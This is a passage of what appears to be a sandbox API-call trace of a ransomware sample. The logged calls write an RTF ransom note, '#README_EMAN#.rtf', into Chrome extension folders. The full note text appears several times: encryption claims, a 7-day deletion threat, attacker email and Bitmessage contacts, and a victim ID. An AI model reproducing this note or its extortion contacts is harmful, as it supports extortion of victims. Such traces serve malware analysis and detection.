Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.228] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.228] CloseHandle (hObject=0x294) returned 1 [0278.228] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\#readme_eman#.rtf")) returned 0xffffffff [0278.229] GetLastError () returned 0x2 [0278.229] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.229] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.229] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 